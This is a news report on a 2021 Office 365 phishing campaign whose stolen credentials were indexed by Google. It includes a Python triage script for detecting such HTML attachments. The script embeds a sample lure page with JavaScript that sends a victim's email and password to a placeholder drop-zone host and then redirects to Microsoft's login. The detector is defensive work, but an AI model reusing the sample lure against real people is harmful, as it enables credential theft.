22 January 2021

Hackers accidentally exposed stolen credentials via Google search


The threat actor behind a large-scale phishing campaign targeting thousands of organizations worldwide made a simple mistake that let anyone retrieve the stolen credentials with a Google search.

The phishing campaign, active since August 2020, uses emails disguised as Xerox scan notifications, dozens of domains that host the phishing pages, and compromised WordPress websites that serve as drop-zone servers for the stolen data.

“While this infection chain may sound simple, it successfully bypassed Microsoft Office 365 Advanced Threat Protection (ATP) filtering and stole over a thousand corporate employees’ credentials,” Check Point Research said in a blog post describing the campaign.

The attack starts with an email imitating a Xerox/Xeros scan notification with an attached HTML file. When the file is opened, it displays a blurred image of a document with the victim's email address already filled in, and JavaScript embedded in the file runs in the background. This code performs simple checks on the entered password, sends the data to the attackers' drop-zone server, and then redirects the user to a legitimate Office 365 login page.
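The attachment behaviour described above can be triaged statically before a user ever opens it. The script below is an added example, not code from this page or from Check Point: it parses an HTML attachment and flags the indicators the paragraph lists (a pre-filled email address, a blurred decoy image, a password field, inline JavaScript that POSTs the captured data to an external drop-zone URL, and a redirect to a legitimate login page). The sample attachment, the drop-zone host and the upload path are constructed placeholders, not indicators from the real campaign. It also flags a form whose `action` posts to an external host, which goes slightly beyond the pattern the article describes.

```python
"""Static triage of an HTML email attachment for the credential-harvesting
pattern described above.  Added example; not Check Point's code."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample lure for illustration only (NOT from the real campaign).
SAMPLE_ATTACHMENT = """<html><body>
<img src="data:image/png;base64,AAAA" style="filter:blur(6px)">
<form id="f">
  <input type="email" id="email" value="jane.doe@example.com" readonly>
  <input type="password" id="pw">
  <button>Open document</button>
</form>
<script>
document.getElementById("f").onsubmit = function(e){
  e.preventDefault();
  var p = document.getElementById("pw").value;
  if (p.length < 6) { alert("Wrong password"); return; }   // "simple password check"
  var x = new XMLHttpRequest();
  x.open("POST", "https://compromised-wordpress.example/wp-content/uploads/drop.php", true);
  x.send("u=" + document.getElementById("email").value + "&p=" + p);
  window.location = "https://login.microsoftonline.com/";   // bounce to real login
};
</script></body></html>"""

# XMLHttpRequest.open("POST", "<url>") and a location-based redirect.
POST_RE = re.compile(r"""\.open\(\s*["']POST["']\s*,\s*["'](https?://[^"']+)["']""", re.I)
REDIRECT_RE = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["'](https?://[^"']+)["']""")
# Hosts a phishing kit typically redirects to after capture (assumption: Microsoft logins).
TRUSTED_LOGIN_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class _Collector(HTMLParser):
    """Gather password fields, pre-filled addresses, form actions and script bodies."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.prefilled_email = None
        self.form_actions = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        kind = (a.get("type") or "").lower()
        if tag == "input" and kind == "password":
            self.password_inputs += 1
        elif tag == "input" and kind == "email" and a.get("value"):
            self.prefilled_email = a["value"]
        elif tag == "form" and (a.get("action") or "").startswith("http"):
            self.form_actions.append(a["action"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage(html: str) -> dict:
    """Return the indicators found in one HTML attachment and a verdict."""
    c = _Collector()
    c.feed(html)
    js = "\n".join(c.scripts)
    findings = []
    if c.prefilled_email:
        findings.append(f"pre-filled victim address {c.prefilled_email}")
    if c.password_inputs:
        findings.append(f"{c.password_inputs} password field(s) inside an email attachment")
    if re.search(r"filter\s*:\s*blur", html, re.I):
        findings.append("blurred decoy image (CSS blur filter)")
    # Exfiltration targets: JS POSTs plus any form that submits to an external host.
    drop_zones = sorted({urlparse(u).hostname for u in POST_RE.findall(js) + c.form_actions} - {None})
    for host in drop_zones:
        findings.append(f"credentials POSTed to external host {host}")
    redirect = None
    m = REDIRECT_RE.search(js)
    if m:
        redirect = urlparse(m.group(1)).hostname
        if redirect in TRUSTED_LOGIN_HOSTS:
            findings.append(f"post-submit redirect to legitimate login page {redirect}")
    # A password field plus an exfiltration target is the decisive pair.
    if c.password_inputs and drop_zones:
        verdict = "phishing-kit"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "drop_zones": drop_zones,
            "redirect": redirect, "prefilled_email": c.prefilled_email}


if __name__ == "__main__":
    for k, v in triage(SAMPLE_ATTACHMENT).items():
        print(f"{k}: {v}")
```

Run on a quarantined attachment (`triage(open("scan.html").read())`) the drop-zone hostnames in the result are the values to block at the proxy and to pivot on in mail logs, since the same compromised site is reused for roughly two months across the campaign's .XYZ sender domains.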

The attackers distributed the spam from compromised accounts. In one instance, the researchers found a phishing page impersonating IONOS by 1&1, a German web hosting company; Check Point says it is "highly likely" that the compromised IONOS account credentials were then used to send the rest of the Office 365-themed spam.

The attackers' mistake was on the receiving end. Once the stolen information reached the drop-zone servers, it was written to a file in a publicly accessible location that Google was able to index, so anyone could find the stolen email addresses and passwords with a simple Google search.

Each drop-zone server stayed in use for roughly two months and was linked to the .XYZ domains used in the phishing attempts.

Based on a subset of nearly 500 stolen credentials, the researchers identified the industries targeted in this campaign. The threat actor appears to focus mainly on companies in the construction, energy and information technology sectors.

Check Point reached out to Google and informed the tech giant of the credential indexing.

“Victims now can use Google search capabilities to look for their stolen credentials and change their passwords accordingly,” Check Point said.
